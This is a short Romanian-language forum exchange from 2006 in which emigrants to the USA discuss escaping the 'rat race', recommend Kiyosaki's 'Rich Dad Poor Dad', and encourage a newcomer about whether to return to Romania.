Te inteleg atunci cand vorbesti ca te simti ca in cursa fara sfarsitahamsterului . Am citit chiar mai multe carti pe tema asta si cum sa iesi din cursa aia . Sunt scrise de Robert T. Kiyosaki iar prima este " Tata bogat , tata sarac " pe care o ....

Acum insa va intreb pe amandoi : cu tot greul de acolo , v-ati mai intorce la viata din Ro ?

Daniel,

Nu pot sa spun decit Felicitari si smileys/smiley20.gifpentru faptul ca te documentezi si te pregatesti pentru o viata "noua". Cu atit mai mult cu cit mentionezi RDPD a lui Kiyosaki. Ai mentionat ca ai bussinesul tau si ca ai facut multe alte lucruri care sint convins ca te vor ajuta aici in SUA. Daca tu ai inteles, ai internalizat si mai apoi incepi sa aplici ce ai "luat" din RDPD in viata de zi cu zi, nu vei avea absolut nici o problema. Nu pot sa raspund in numele lui Transit si nici a lui Pop12mariu, dar cred, citindu-le gindurile asternute aici pe forum ca amindoi sint pe calea cea buna, chiar daca Transit inca se simte "in the rat race". Nu cred ca ei s-ar mai intoarce in Romania. Daca ii citesti posturile lui Transit, vei vedea, si imi vei da dreptate ca "rat race-ul" lui e doar ceva temporar.

Oricum, sanatate si mult succes in noua ta viata !

usdream
07.05.2006, 08:36
va multumesc pt raspunsurile voastre incurajatoare smileys/smiley1.gif